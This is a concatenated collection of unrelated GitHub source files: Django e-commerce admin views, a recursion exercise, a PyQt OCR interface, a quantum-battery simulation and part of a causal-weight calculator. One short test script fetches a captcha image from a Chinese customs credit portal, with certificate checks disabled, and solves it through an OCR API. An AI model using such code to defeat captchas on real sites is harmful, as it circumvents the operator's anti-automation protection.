user_order.objects.values('order_no','email','order_date','payment_status','order_status')\n 
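# values() returns plain dicts limited to the listed columns, which is\n # all the read-only orders table needs (no full model instances)\n 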
return render(request,'cycloneadmin_orders.html',{'orders':orders})\n\n\n\ndef cycloneadmin_reports(request):\n return render(request,'cycloneadmin_reports.html')\n\n\n\nclass cycloneadmin_addproduct(View):\n\n def get(self, request):\n return render(request,'cycloneadmin_addproduct.html')\n\n def post(self, request):\n\n # fetch data if the request is post\n if request.method == \"POST\":\n\n # for product table\n company = request.POST['company']\n model = request.POST['model']\n wheel_size = request.POST['wheel_size']\n suspention = request.POST['suspention']\n internal_cabling = request.POST['internal_cabling']\n bike_type = request.POST['bike_type']\n gender_cat = request.POST['gender_cat']\n\n # for product_description table\n terrain_description = request.POST['terrain_description']\n strength_description = request.POST['strength_description']\n perfomance_description = request.POST['perfomance_description']\n precision_description = request.POST['precision_description']\n \n # checking the product is already exist or not\n if product.objects.filter(company = company, model = model).exists():\n messages.warning(request,\"Product already exist\")\n return redirect(\"addproduct\")\n\n\n newproduct = product(company = company, model = model, wheel_size = wheel_size, suspention = suspention, internal_cabling = internal_cabling, bike_type = bike_type, gender_cat = gender_cat)\n newproduct.save()\n newdescription = product_description(product_id = newproduct, terrain_description = terrain_description, strength_description = strength_description, perfomance_description = perfomance_description, precision_description = precision_description)\n newdescription.save()\n\n messages.info(request,\"New Product added successfully\")\n return redirect(\"addproduct\") \n\n\n\n\ndef cycloneadmin_editproduct(request,product_id):\n\n if request.method == 'POST':\n \n # fetch the info from user edit request\n company = request.POST['company']\n model = request.POST['model']\n wheel_size = request.POST['wheel_size']\n suspention = request.POST['suspention']\n internal_cabling = request.POST['internal_cabling']\n bike_type = request.POST['bike_type']\n gender_cat = request.POST['gender_cat']\n terrain_description = request.POST['terrain_description']\n strength_description = request.POST['strength_description']\n perfomance_description = request.POST['perfomance_description']\n precision_description = request.POST['precision_description']\n \n # update all the information , not a good practce\n # only update changed fields only using ajax\n product.objects.filter(product_id = product_id).update(company = company, model = model, wheel_size = wheel_size, suspention = suspention, internal_cabling = internal_cabling, bike_type = bike_type, gender_cat = gender_cat)\n product_description.objects.filter(product_id = product_id).update(terrain_description = terrain_description, strength_description = strength_description, perfomance_description = perfomance_description, precision_description = precision_description)\n print(\"data updated\")\n return redirect(\"products\")\n\n # using product is fetch data and pass to the html to edit\n products = product.objects.select_related(\"product_id\").values(\"company\",\"model\",\"wheel_size\",\"suspention\",\"internal_cabling\",\"bike_type\",\"gender_cat\",\"product_description__terrain_description\",\"product_description__strength_description\",\"product_description__perfomance_description\",\"product_description__precision_description\").get(product_id = 
product_id)\n return render(request,'cycloneadmin_editproduct.html',{\"products\":products})\n\nclass cycloneadmin_coupenmanagemant(View):\n\n def get(self, request):\n coupens = discount_coupen.objects.values(\"coupen_no\",\"coupen_type\",\"discount\",\"expiry_date\")\n return render(request,'cycloneadmin_coupen_managemant.html',{'coupens':coupens})\n\n\n\nclass cycloneadmin_offer_management(View):\n \n def get(self, request):\n\n offer_list = product_category.objects.filter(is_discounted = True).values('product_id__company','product_id__model','mrp','seller_price')\n \n return render(request, 'cycloneadmin_offer_management.html',{\"offer_list\":offer_list})\n\n\nclass cycloneadmin_add_offer(View):\n\n def post(self, request):\n \"\"\"\n if the offer model is none it means we have to put offer\n to the all models in that product. else that specific products only\n \"\"\"\n\n offer_company = request.POST['offer_company']\n offer_model = request.POST['offer_model']\n offer_price = request.POST['offer_price']\n print('request hit')\n # if offer for specific products\n if offer_model:\n\n new_offer_item = product_category.objects.filter(product_id__company = offer_company, product_id__model = offer_model)\n # if the product not found\n if len(new_offer_item ) == 0 :\n return JsonResponse({'status':404,'message':'product not found'})\n\n \n return JsonResponse({'status':200,'message':'products added to offer category'})\n \n # offer for all model in the product\n else:\n pass\n\n\n \n\n\nclass cyclone_addcoupen(View):\n \n # admin coupen add request\n def post(self, request):\n print(\"add coupen request\")\n\n # fetching coupen data from ajax post request\n coupen_no = request.POST['coupen_no']\n coupen_type = request.POST['coupen_type']\n coupen_discount = request.POST['coupen_discount']\n coupen_expiry_date = request.POST['coupen_expiry_date']\n\n # checking the coupen already exixt or not\n if discount_coupen.objects.filter(coupen_no = coupen_no).exists():\n return JsonResponse({'status':409, 'message':'coupen already exist'}) \n\n # updating data base\n new_coupen = discount_coupen(coupen_no = coupen_no,coupen_type = coupen_type,discount = coupen_discount, expiry_date = coupen_expiry_date)\n new_coupen.save()\n\n return JsonResponse({'status':200, 'message':'coupen updated'})\n\n\n# delete coupen\nclass cycloneadmin_deletecoupen(View):\n \n def post(self, request):\n coupen_no = request.POST['coupen_no']\n discount_coupen.objects.get(coupen_no = coupen_no).delete()\n return JsonResponse({'status':200,'message':'coupen removed successfully'})\n\n\n\n# dicontinue or continue product/ all categories\n\nclass cycloneadmin_discontinuproduct(View):\n\n def get(self,request):\n print('didcontinue hit')\n \"\"\"\n when a product need to be discontinued we have to set is_discontinue\n filds of every category of the pericular product as True\n \"\"\"\n\n product_id = request.GET['product_id']\n product_dis_continue = product.objects.get(product_id = product_id)\n product_category.objects.filter(product_id = product_dis_continue).update(is_discontinued = True)\n return JsonResponse({'status':200,'message':'product discontinued'})\n\n\nclass cycloneadmin_order_updation(View):\n\n def get(self, request):\n order_no = request.GET['order_no']\n order = user_order.objects.get(order_no = order_no)\n \n return 
JsonResponse({\"status\":200,\"order_no\":order.order_no,\"payment_method\":order.payment_method,\"payment_status\":order.payment_status,\"order_status\":order.order_status,'email':order.email.email,'order_date':order.order_date})\n\n\n def post(self, request):\n order_no = request.POST['order_no']\n update_val = request.POST['update_val']\n print(update_val)\n try:\n user_order.objects.filter(order_no = order_no).update(order_status = update_val)\n except Exception:\n return JsonResponse({'status':404,'message':'update failed'})\n return JsonResponse({'status':200,'message':'status updated'})\n\nclass cycloneadmin_cancel_order(View):\n\n def post(self, request):\n order_no = request.POST['order_no']\n try:\n user_order.objects.filter(order_no = order_no).update(order_status = \"cancelled by admin\")\n except Exception:\n return JsonResponse({'status':404, 'messages':'cancellation failed'})\n\n return JsonResponse({'status':200, 'messages':'order cancelled'})\n\n\nclass cycloneadmin_report_generator(View):\n \n def get(self,request):\n\n # returns the sales report for the requested date range to the admin\n from_date = request.GET['from_date']\n to_date = request.GET['to_date']\n\n total_shipments = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date).count()\n total_business = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date).aggregate(Sum('payment_amount'))['payment_amount__sum']\n total_cod_order = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date,payment_method = \"Cash on delivery(COD)\").count()\n total_payed_orders = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date,payment_method = \"Net banking / UPI\").count()\n canceled_orders = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date,order_status = \"order canceled\").count()\n total_users = CustomUser.objects.count() - 1\n total_product_quantity = product_category.objects.aggregate(Sum(\"quantity\"))['quantity__sum']\n \n report = {\"total_shipments\":total_shipments,\"total_business\":total_business,\"total_cod_order\":total_cod_order,\"total_payed_orders\":total_payed_orders,\"canceled_orders\":canceled_orders,\"total_users\":total_users,\"total_product_quantity\":total_product_quantity}\n return JsonResponse({'status':200,\"report\":report})\n\n\nclass pdf_report_downloader(View):\n\n def get(self, request):\n\n # fetching data from the url\n from_date = request.GET['from_date']\n to_date = request.GET['to_date']\n\n # fetching data from the database by filtering with the date range\n total_shipments = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date).count()\n total_business = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date).aggregate(Sum('payment_amount'))['payment_amount__sum']\n total_cod_order = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date,payment_method = \"Cash on delivery(COD)\").count()\n total_payed_orders = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date,payment_method = \"Net banking / UPI\").count()\n canceled_orders = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date,order_status = \"order canceled\").count()\n total_users = CustomUser.objects.count() - 1\n total_product_quantity = product_category.objects.aggregate(Sum(\"quantity\"))['quantity__sum']\n \n buffer = io.BytesIO()\n pdf = canvas.Canvas(buffer, pagesize=letter, 
bottomup=0)\n \n textobj = pdf.beginText()\n textobj.setTextOrigin(inch,inch)\n \n lines= [\n \"total shipments :\"+str(total_shipments),\n \"total business :\"+str(total_business),\n \"total cod order :\"+str(total_cod_order),\n \"total payed orders :\"+str(total_payed_orders),\n \"canceled orders :\"+str(canceled_orders),\n \"total users :\"+str(total_users),\n \"total product quantity :\"+str(total_product_quantity)\n ]\n\n for line in lines:\n textobj.textLine(line)\n \n pdf.drawText(textobj)\n pdf.showPage()\n pdf.save()\n buffer.seek(0)\n return FileResponse(buffer, as_attachment=True, filename=\"report.pdf\")\n\n \nclass csv_report_downloader(View):\n \n def get(self, request):\n \n # fetching data from the url\n from_date = request.GET['from_date']\n to_date = request.GET['to_date']\n\n # fetching data from data base by filtering with the date range\n total_shipments = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date).count()\n total_business = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date).aggregate(Sum('payment_amount'))['payment_amount__sum']\n total_cod_order = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date,payment_method = \"Cash on delivery(COD)\").count()\n total_payed_orders = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date,payment_method = \"Net banking / UPI\").count()\n canceled_orders = user_order.objects.filter(order_date__gte = from_date , order_date__lte = to_date,order_status = \"order canceled\").count()\n total_users = CustomUser.objects.count() - 1\n total_product_quantity = product_category.objects.aggregate(Sum(\"quantity\"))['quantity__sum']\n \n # Create the HttpResponse object with the appropriate CSV header.\n response = HttpResponse(\n content_type=\"text/csv\",\n headers={\"Content-Disposition\": 'attachment; filename=\"report.csv\"'},\n )\n\n # write contents to the csv file\n writer = csv.writer(response)\n writer.writerow([\"total_shipments\",total_shipments])\n writer.writerow([\"total_business\",total_business])\n writer.writerow([\"total_cod_order\",total_cod_order])\n writer.writerow([\"total_payed_orders\",total_payed_orders])\n writer.writerow([\"canceled_orders\",canceled_orders])\n writer.writerow([\"total_users\",total_users])\n writer.writerow([\"total_product_quantity\",total_product_quantity])\n\n return response\n\n \n\n","repo_name":"Rashicom/cyclone_ecom","sub_path":"cycloneadmin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":22982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26198016883","text":"# needs revisit, only distinct combinations is displayed\ndef recursion(n, used):\n def solution(idx, n, used, ans=[], res=[]):\n if n == 0:\n res.append(ans)\n return \n \n if idx > n:\n return\n \n if not used[idx]:\n used[idx] = True\n solution(idx+1, n - idx, used, ans +[idx], res)\n for i in range(idx, n+1):\n if not used[i]:\n used[i] = True\n solution(idx+1, n - i, used, ans + [i], res)\n used[i] = False\n used[idx] = False\n \n return res \n return solution(1, n, used)\n\nn = 5\nused = [False]*(n+1)\nprint(recursion(n, used)) # [[1,4], [3,2],[5]]\n\n\n# Method 2 - prints all combinations\n\ndef recursion(idx, n, tgt, ans=[], res=[]):\n if idx > n or tgt < 0:\n return\n\n if tgt == 0:\n if ans not in res:\n res.append(ans)\n return\n\n for i in range(idx, n+1):\n recursion(i + 1, n, tgt-i, ans + [i], res)\n 
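# the call above consumes i and advances the index (each value used at\n # most once); the call below keeps i so the same value can repeat\n 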
recursion(i, n, tgt - i, ans + [i], res)\n\n return res\n\n\nn = 5\nprint(recursion(1, n, n))","repo_name":"srihariprasad-r/workable-code","sub_path":"Practice problems/foundation/recursion/print_all_combinations_of_n.py","file_name":"print_all_combinations_of_n.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"14451486278","text":"import sys\r\nimport os\r\nfrom PyQt5.QtWidgets import QApplication, QVBoxLayout, QMainWindow, QPushButton, QFileDialog, QWidget, QCheckBox, QHBoxLayout\r\n\r\n# User defined imports\r\nfrom OCR_reader import OCRReader\r\n\r\n\r\nclass MainWindow(QMainWindow):\r\n def __init__(self):\r\n super(MainWindow, self).__init__()\r\n self.image_path = None\r\n self.display_bg = True\r\n self.display_image = True\r\n\r\n self.initUI()\r\n\r\n def initUI(self):\r\n self.setWindowTitle(\"OCR Reader\")\r\n\r\n bg_box = QCheckBox(\"Display Background\")\r\n bg_box.setChecked(True)\r\n bg_box.stateChanged.connect(lambda: self.bg_state(bg_box))\r\n image_box = QCheckBox(\"Display Image\")\r\n image_box.setChecked(True)\r\n image_box.stateChanged.connect(lambda: self.image_state(image_box))\r\n upload_button = QPushButton(\"Upload Image\", self)\r\n upload_button.clicked.connect(self.upload_image)\r\n reconvert_button = QPushButton(\"Re-Convert\", self)\r\n reconvert_button.clicked.connect(self.convert_image_to_text)\r\n\r\n widget = QWidget()\r\n h_layout = QHBoxLayout()\r\n h_layout.addStretch(1)\r\n h_layout.addWidget(bg_box)\r\n h_layout.addWidget(image_box)\r\n\r\n v_layout = QVBoxLayout()\r\n v_layout.addStretch(1)\r\n v_layout.addLayout(h_layout)\r\n v_layout.addWidget(upload_button)\r\n v_layout.addWidget(reconvert_button)\r\n widget.setLayout(v_layout)\r\n self.setCentralWidget(widget)\r\n\r\n def upload_image(self):\r\n image_path, _ = QFileDialog.getOpenFileName(self, \"Select image\", os.getenv(\"HOME\"), \"(*.png *.xpm *.jpg)\")\r\n if image_path != \"\":\r\n self.image_path = image_path\r\n self.convert_image_to_text()\r\n\r\n def convert_image_to_text(self):\r\n if self.image_path is not None:\r\n OCRReader(self.image_path, self.display_bg, self.display_image)\r\n else:\r\n print(\"Please select an image file first!\")\r\n\r\n def bg_state(self, button):\r\n self.display_bg = True if button.isChecked() else False\r\n\r\n def image_state(self, button):\r\n self.display_image = True if button.isChecked() else False\r\n\r\n\r\nif __name__ == \"__main__\":\r\n ocr_app = QApplication(sys.argv)\r\n ocr_app.setStyle(\"Fusion\")\r\n gui = MainWindow()\r\n gui.show()\r\n sys.exit(ocr_app.exec_())\r\n","repo_name":"Pramod07Ch/GUI-image-to-text-convertor","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"}
+{"seq_id":"24431138919","text":"# -*- coding: utf-8 -*-\n\"\"\"\n *Author:\t\t\t王成杰\n *Filename:\t\t\tFig4-Entanglement-Coherence-and-charging-process-of-QB\n *Date:\t\t\t2023-08-22 12:44:11\n *Description: reproduce Fig. 4; this figure is a function of two variables\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\n\n\n\ndef calculate_cq(rho, *alpha):\n \"\"\"\n compute C0 and Q\n \"\"\"\n a_uu, a_ud, a_du, a_dd = alpha\n c = (np.sum(np.abs(rho)) - np.trace(np.abs(rho))) / 3\n\n q = 2 * np.abs(a_uu * a_dd - a_ud * a_du)\n return c, q\n\n\ndef calculate(J,triangle):\n \"\"\"\n compute the averages of E, P, C0 and Q\n \"\"\"\n # ================== initialization\n Omega = 1 # 
characterizes the driving strength of the external field\n hbar = 1 # natural units\n omega0 = 1 # the atom's own oscillation frequency\n t_min = np.pi / Omega / 2\n t = np.linspace(0,t_min,1000)\n t_delta = t[1] - t[0]\n alpha = J * (triangle - 1) # 1\n beta = np.sqrt(J ** 2 * (triangle - 1) ** 2 + 4 * Omega ** 2) # 2\n gamma1 = 2 * Omega / np.sqrt(2 * (alpha + beta) ** 2 + 8 * Omega ** 2) # 0.5\n gamma2 = (alpha + beta) / np.sqrt(2 * (alpha + beta) ** 2 + 8 * Omega ** 2) # 0.5\n E_max=4*omega0*hbar\n P_max = E_max*Omega\n E = np.ones_like(t) # system energy\n C0 = np.ones_like(E) # system coherence\n Q = np.ones_like(E) # system entanglement\n\n # eigenstates of a single spin\n up = np.array([[1], [0]])\n down = np.array([[0], [1]])\n # coupled basis states of the two particles\n uu = np.kron(up, up)\n ud = np.kron(up, down)\n dd = np.kron(down, down)\n du = np.kron(down, up)\n # matrix form of the free Hamiltonian of the system\n H0 = 2 * hbar * omega0 * np.dot(uu, uu.T) + hbar * omega0 * np.dot(ud, ud.T) \\\n - hbar * omega0 * np.dot(du, du.T) - 2 * hbar * omega0 * np.dot(dd, dd.T)\n # initialize the eigenstates\n E1_s = (dd - uu) / np.sqrt(2) # -1/sqrt(2), 0, 0, 1/sqrt(2)\n E2_s = (du - ud) / np.sqrt(2) # 0, -1/sqrt(2), 1/sqrt(2), 0\n E3_s = gamma1 * (dd + uu) - gamma2 * (du + ud) # 0.5 -0.5 -0.5 0.5\n E4_s = gamma2 * (dd + uu) + gamma1 * (du + ud) # 0.5 0.5 0.5 0.5\n\n # initialize the eigenenergies\n E1 = hbar * triangle * J # 1\n E2 = -hbar * (triangle + 2) * J # -3\n E3 = hbar * (J - beta) # -1\n E4 = hbar * (J + beta) # 3\n\n # ======================= time evolution of the system ===================\n # the initial state is dd; to express it in the H eigenbasis we need the coefficient on each eigenstate\n c1 = np.dot(E1_s.T, dd) # 1/sqrt(2)\n c2 = np.dot(E2_s.T, dd) # 0\n c3 = np.dot(E3_s.T, dd) # 0.5\n c4 = np.dot(E4_s.T, dd) # 0.5\n # time evolution of the system state vector\n Psi_t = c1 * np.kron(np.exp(-1j / hbar * E1 * t), E1_s) + c2 * np.kron(np.exp(-1j / hbar * E2 * t), E2_s) + \\\n c3 * np.kron(np.exp(-1j / hbar * E3 * t), E3_s) + c4 * np.kron(np.exp(-1j / hbar * E4 * t), E4_s)\n\n for i in range(1000):\n rho = np.dot(Psi_t[:,i].reshape(4,1),np.conj(Psi_t[:,i]).reshape(1,4))\n E[i] = np.trace(np.dot(rho,H0)) + 2*hbar*omega0\n alpha_uu = np.dot(uu.T, Psi_t[:, i])\n alpha_ud = np.dot(ud.T, Psi_t[:, i])\n alpha_du = np.dot(du.T, Psi_t[:, i])\n alpha_dd = np.dot(dd.T, Psi_t[:, i])\n C0[i],Q[i] = calculate_cq(\n rho,\n alpha_uu,\n alpha_ud,\n alpha_du,\n alpha_dd\n )\n \n P = np.diff(E) / t_delta / P_max\n E = E / E_max\n\n E_ave,P_ave,C0_ave,Q_ave = calculate_ave(E,P,Q,C0,t_min,t_delta)\n return E_ave,P_ave,C0_ave,Q_ave\n\ndef calculate_ave(E,P,Q,C0,t_min,t_delta):\n E_ave = E[-1]\n P_ave = np.sum(P) / t_min * t_delta\n C0_ave = np.sum(C0) / t_min * t_delta\n Q_ave = np.sum(Q)/t_min * t_delta\n return E_ave,P_ave,C0_ave,Q_ave\n\ndef draw(E,P,Q,C0,triangle,J):\n \"\"\"\n draw the 3D surface plots\n \"\"\"\n fig, ax = plt.subplots(subplot_kw={'projection': '3d'})\n surf = ax.plot_surface(triangle,np.log10(J),E, cmap= cm.coolwarm)\n ax.set_xlabel('$\\\\Delta$')\n ax.set_ylabel('$log_{10}(J/\\\\Omega)$')\n ax.set_zlabel('$W_{fin}$')\n ax.set(yticks=[-1,-0.5,0,0.5,1],xticks=[-1,0,1])\n ax.set(yticklabels=['$-1$','$-0.5$','$0$','$0.5$','$1$'],\n xticklabels=['$-1$','$0$','$1$'],)\n fig.colorbar(surf, shrink=0.5, aspect=5)\n\n# \n fig, ax = plt.subplots(subplot_kw={'projection': '3d'})\n surf = ax.plot_surface(triangle,np.log10(J),P,cmap= cm.coolwarm)\n ax.set_xlabel('$\\\\Delta$')\n ax.set_ylabel('$log_{10}(J/\\\\Omega)$')\n ax.set_zlabel('$\\\\bar{P}$')\n ax.set(yticks=[-1,-0.5,0,0.5,1],xticks=[-1,0,1])\n ax.set(yticklabels=['$-1$','$-0.5$','$0$','$0.5$','$1$'],\n xticklabels=['$-1$','$0$','$1$'],)\n fig.colorbar(surf, shrink=0.5, aspect=5)\n\n# \n fig, ax = plt.subplots(subplot_kw={'projection': '3d'})\n surf= ax.plot_surface(triangle,np.log10(J),Q, cmap= cm.coolwarm)\n 
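# third panel: time-averaged entanglement Q over the (Delta, log10(J/Omega)) grid\n 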
ax.set_xlabel('$\\Delta$')\n ax.set_ylabel('$log_{10}(J/\\Omega)$')\n ax.set_zlabel('$\\bar{Q}$')\n ax.set(yticks=[-1,-0.5,0,0.5,1],xticks=[-1,0,1])\n ax.set(yticklabels=['$-1$','$-0.5$','$0$','$0.5$','$1$'],\n xticklabels=['$-1$','$0$','$1$'],)\n fig.colorbar(surf, shrink=0.5, aspect=5)\n\n# \n fig, ax = plt.subplots(subplot_kw={'projection': '3d'})\n surf = ax.plot_surface(triangle,np.log10(J),C0, cmap= cm.coolwarm)\n ax.set_xlabel('$\\\\Delta$')\n ax.set_ylabel('$log_{10}(J/\\\\Omega)$')\n ax.set_zlabel('$\\\\bar{C}_{0}$')\n ax.set(yticks=[-1,-0.5,0,0.5,1],xticks=[-1,0,1])\n ax.set(yticklabels=['$-1$','$-0.5$','$0$','$0.5$','$1$'],\n xticklabels=['$-1$','$0$','$1$'],)\n fig.colorbar(surf, shrink=0.5, aspect=5)\n \n plt.show()\n\n\n\n\ndef main():\n \"\"\"\n compute the averages of E, P, C0 and Q as functions of triangle and log(J/Omega)\n \"\"\"\n Jn = 100\n tn = 5\n J = np.linspace(0.1,10,Jn)\n triangle = np.linspace(-1,1,tn)\n J_s,t_s = np.meshgrid(J,triangle)\n E = np.ones_like(J_s)\n P = np.ones_like(J_s)\n C0 = np.ones_like(J_s)\n Q = np.ones_like(J_s)\n # calculate(0,1)\n for i in range(tn):\n for j in range(Jn):\n E[i,j],P[i,j],C0[i,j],Q[i,j] = calculate(J_s[i,j],t_s[i,j])\n print('i={},j={}'.format(i,j))\n draw(E,P,Q,C0,t_s,J_s)\n\n\n \nif __name__==\"__main__\":\n main()","repo_name":"1024Person/Quatum-Battery","sub_path":"Fig4-Entanglement-Coherence-and-charging-process-of-QB.py","file_name":"Fig4-Entanglement-Coherence-and-charging-process-of-QB.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
+{"seq_id":"71839636730","text":"# !/usr/bin/python3\n# -*-coding:utf-8-*-\n# Author: zhou jun wei\n# CreateDate: 2021/12/3 13:14\n\n# from setup import author, version\n# print('name: {}, version {}'.format(\"zjw\", \"0.0.1\"))\n\nfrom zjwocr.ocr import ocr_api\nimport requests, time\nimport torch, io\nfrom PIL import Image\n\nurl = 'http://credit.customs.gov.cn/ccppserver/verifyCode/creator?{}'.format(int(time.time() * 1000))\nresp = requests.get(url, headers={\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36'\n}, verify=False, timeout=10)\ncheckCode = ocr_api({'图片': resp.content,'网站': '中国海关企业进出口信用信息公示平台'})\n\nim = Image.open(io.BytesIO(resp.content))\nim.seek(8)\nimg_byte = io.BytesIO()\nim.save(img_byte, format='PNG')\nbinary_content = img_byte.getvalue()\nwith open('{}.png'.format(checkCode[\"code\"]), \"wb\") as lk:\n lk.write(binary_content)\nprint(checkCode)","repo_name":"zjw505104341/ocrimg","sub_path":"zjwocr/models_test/credit_customs_gov_cn_test.py","file_name":"credit_customs_gov_cn_test.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"}
+{"seq_id":"19147793257","text":"# -*- coding: utf-8 -*-\n\"\"\"Calculates weight and auxiliary data for each causevar and writes to files.\n\nAll weight data file output writers are now called at this level, making the\nprocess interruption tolerant up to a single causevar analysis.\n\n\"\"\"\n\nimport csv\nimport logging\nimport os\nfrom functools import partial\n\nimport numpy as np\nimport pathos\nfrom pathos.multiprocessing import ProcessingPool as Pool\n\n\ndef writecsv_weightcalc(filename, datalines, header):\n \"\"\"CSV writer customized for writing weights.\"\"\"\n\n with open(filename, \"w\", newline=\"\") as f:\n csv.writer(f).writerow(header)\n csv.writer(f).writerows(datalines)\n\n\ndef 
readcsv_weightcalc(filename):\n \"\"\"CSV reader customized for reading weights.\"\"\"\n\n with open(filename) as f:\n header = next(csv.reader(f))[:]\n values = np.genfromtxt(f, delimiter=\",\", dtype=str)\n\n return values, header\n\n\ndef calc_weights_oneset(\n weightcalcdata,\n weightcalculator,\n box,\n startindex,\n size,\n newconnectionmatrix,\n method,\n boxindex,\n filename,\n headerline,\n writeoutput,\n causevarindex,\n):\n\n causevar = weightcalcdata.variables[causevarindex]\n\n print(\n \"Start analysing causal variable: \"\n + causevar\n + \" [\"\n + str(causevarindex + 1)\n + \"/\"\n + str(len(weightcalcdata.causevarindexes))\n + \"]\"\n )\n\n directional_name = \"weights_directional\"\n absolute_name = \"weights_absolute\"\n neutral_name = \"weights\"\n\n mis_directional_name = \"mis_directional\"\n mis_absolute_name = \"mis_absolute\"\n mis_neutral_name = \"mis\"\n\n auxdirectional_name = \"auxdata_directional\"\n auxabsolute_name = \"auxdata_absolute\"\n auxneutral_name = \"auxdata\"\n\n # Provide names for the significance threshold file types\n if weightcalcdata.allthresh:\n sig_directional_name = \"sigthresh_directional\"\n sig_absolute_name = \"sigthresh_absolute\"\n sig_neutral_name = \"sigthresh\"\n\n # Initiate datalines with delays\n datalines_directional = np.asarray(weightcalcdata.actual_delays)\n datalines_directional = datalines_directional[:, np.newaxis]\n datalines_absolute = datalines_directional.copy()\n datalines_neutral = datalines_directional.copy()\n\n # Datalines needed to store mutual information\n mis_datalines_directional = datalines_directional.copy()\n mis_datalines_absolute = datalines_directional.copy()\n mis_datalines_neutral = datalines_directional.copy()\n\n # Datalines needed to store significance threshold values\n # for each variable combination\n datalines_sigthresh_directional = datalines_directional.copy()\n datalines_sigthresh_absolute = datalines_directional.copy()\n datalines_sigthresh_neutral = datalines_directional.copy()\n\n # Initiate empty auxdata lists\n auxdata_directional = []\n auxdata_absolute = []\n auxdata_neutral = []\n\n if method[:16] == \"transfer_entropy\":\n if os.path.exists(\n filename(auxdirectional_name, boxindex + 1, causevar)\n ):\n auxdata_directional = list(\n np.genfromtxt(\n filename(auxdirectional_name, boxindex + 1, causevar),\n delimiter=\",\",\n dtype=str,\n )[1:, :]\n )\n auxdata_absolute = list(\n np.genfromtxt(\n filename(auxdirectional_name, boxindex + 1, causevar),\n delimiter=\",\",\n dtype=str,\n )[1:, :]\n )\n\n datalines_directional, _ = readcsv_weightcalc(\n filename(directional_name, boxindex + 1, causevar)\n )\n\n datalines_absolute, _ = readcsv_weightcalc(\n filename(absolute_name, boxindex + 1, causevar)\n )\n\n mis_datalines_directional, _ = readcsv_weightcalc(\n filename(mis_directional_name, boxindex + 1, causevar)\n )\n\n mis_datalines_absolute, _ = readcsv_weightcalc(\n filename(mis_absolute_name, boxindex + 1, causevar)\n )\n\n if weightcalcdata.allthresh:\n datalines_sigthresh_directional = readcsv_weightcalc(\n filename(sig_directional_name, boxindex + 1, causevar)\n )\n datalines_sigthresh_absolute = readcsv_weightcalc(\n filename(sig_absolute_name, boxindex + 1, causevar)\n )\n\n for affectedvarindex in weightcalcdata.affectedvarindexes:\n affectedvar = weightcalcdata.variables[affectedvarindex]\n\n logging.info(\n \"Analysing effect of: \"\n + causevar\n + \" on \"\n + affectedvar\n + \" for box number: \"\n + str(boxindex + 1)\n )\n\n exists = False\n do_test = not (\n 
newconnectionmatrix[affectedvarindex, causevarindex] == 0\n )\n # Test if the affectedvar has already been calculated\n if (method[:16] == \"transfer_entropy\") and do_test:\n testlocation = filename(\n auxdirectional_name, boxindex + 1, causevar\n )\n if os.path.exists(testlocation):\n # Open CSV file and read names of second affected vars\n auxdatafile = np.genfromtxt(\n testlocation,\n delimiter=\",\",\n usecols=np.arange(0, 2),\n dtype=str,\n )\n affectedvars = auxdatafile[:, 1]\n if affectedvar in affectedvars:\n print(\"Affected variable results in existence\")\n exists = True\n\n if do_test and (exists is False):\n weightlist = []\n directional_weightlist = []\n absolute_weightlist = []\n sigthreshlist = []\n directional_sigthreshlist = []\n absolute_sigthreshlist = []\n sigfwd_list = []\n sigbwd_list = []\n propfwd_list = []\n propbwd_list = []\n mifwd_list = []\n mibwd_list = []\n\n for delay in weightcalcdata.sample_delays:\n logging.info(\"Now testing delay: \" + str(delay))\n\n causevardata = box[:, causevarindex][\n startindex : startindex + size\n ]\n\n affectedvardata = box[:, affectedvarindex][\n startindex + delay : startindex + size + delay\n ]\n\n weight, auxdata = weightcalculator.calcweight(\n causevardata,\n affectedvardata,\n weightcalcdata,\n causevarindex,\n affectedvarindex,\n )\n\n # Calculate significance thresholds at each data point\n if weightcalcdata.allthresh:\n sigthreshold = weightcalculator.calcsigthresh(\n weightcalcdata, affectedvar, causevar, box, delay\n )\n\n if len(weight) > 1:\n # If weight contains directional as well as\n # absolute weights, write to separate lists\n directional_weightlist.append(weight[0])\n absolute_weightlist.append(weight[1])\n # Same approach with significance thresholds\n if weightcalcdata.allthresh:\n directional_sigthreshlist.append(sigthreshold[0])\n absolute_sigthreshlist.append(sigthreshold[1])\n\n else:\n weightlist.append(weight[0])\n if weightcalcdata.allthresh:\n sigthreshlist.append(sigthreshold[0])\n\n if auxdata is not None:\n if len(auxdata) > 1:\n # This means we have auxdata for both the forward and\n # backward calculation\n [auxdata_fwd, auxdata_bwd] = auxdata\n [\n significance_fwd,\n properties_fwd,\n mi_fwd,\n ] = auxdata_fwd # mi_fwd and mi_bwd should be the same\n [\n significance_bwd,\n properties_bwd,\n mi_bwd,\n ] = auxdata_bwd\n sigfwd_list.append(significance_fwd)\n sigbwd_list.append(significance_bwd)\n propfwd_list.append(properties_fwd)\n propbwd_list.append(properties_bwd)\n 